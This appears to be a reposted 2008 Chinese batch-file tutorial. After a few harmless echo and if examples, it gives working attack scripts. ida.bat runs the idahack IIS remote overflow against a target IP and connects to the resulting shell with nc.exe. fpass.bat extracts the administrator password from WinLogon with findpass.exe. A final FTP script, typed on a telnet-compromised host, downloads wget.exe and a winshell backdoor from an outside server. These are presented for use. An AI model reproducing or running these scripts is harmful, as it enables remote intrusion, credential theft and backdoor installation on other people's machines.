快捷導(dǎo)航

批處理BAT加強(qiáng)函數(shù)代碼使用說明

更新時(shí)間：2008年08月31日 21:47:09 作者：

希望大家想了解BAT批處理的好好看看有所加強(qiáng)，看到剛才發(fā)表的文章我也認(rèn)為BAT的重要性。這點(diǎn)大家都知道所以轉(zhuǎn)了一章好東東大家共同提高。也希望大家有好東東好思想大家來了解加強(qiáng)。

######################################################################
4. 簡單批處理文件概念
######################################################################

echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
第二個(gè)echo是追加
第三個(gè)echo將清空a.txt 重新創(chuàng)建 a.txt

netstat -n │ find "3389"
這個(gè)將要列出所有連接3389的用戶的ip.

________________test.bat___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem 不顯示注釋語句,本行顯示
@rem 不顯示注釋語句,本行不顯示
@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)
___________________________________________________________________________

下面我們以具體的一個(gè)idahack程序就是ida遠(yuǎn)程溢出為例子.應(yīng)該是很簡單的.

___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"

@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2

:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:SP2
@idahack.exe %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END

:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)

:END
_____________________ida.bat__END_________________________________

下面我們?cè)賮淼诙€(gè)文件.就是得到administrator的口令.
大多數(shù)人說得不到.其實(shí)是自己的沒有輸入正確的信息.

___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%\_findpass.txt
@goto END

:USAGE
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________

還有一個(gè)就是已經(jīng)通過telnet登陸了一個(gè)遠(yuǎn)程主機(jī).怎樣上傳文件(win)
依次在窗口輸入下面的東西. 當(dāng)然了也可以全部拷貝.Ctrl+V過去. 然后就等待吧!!

echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w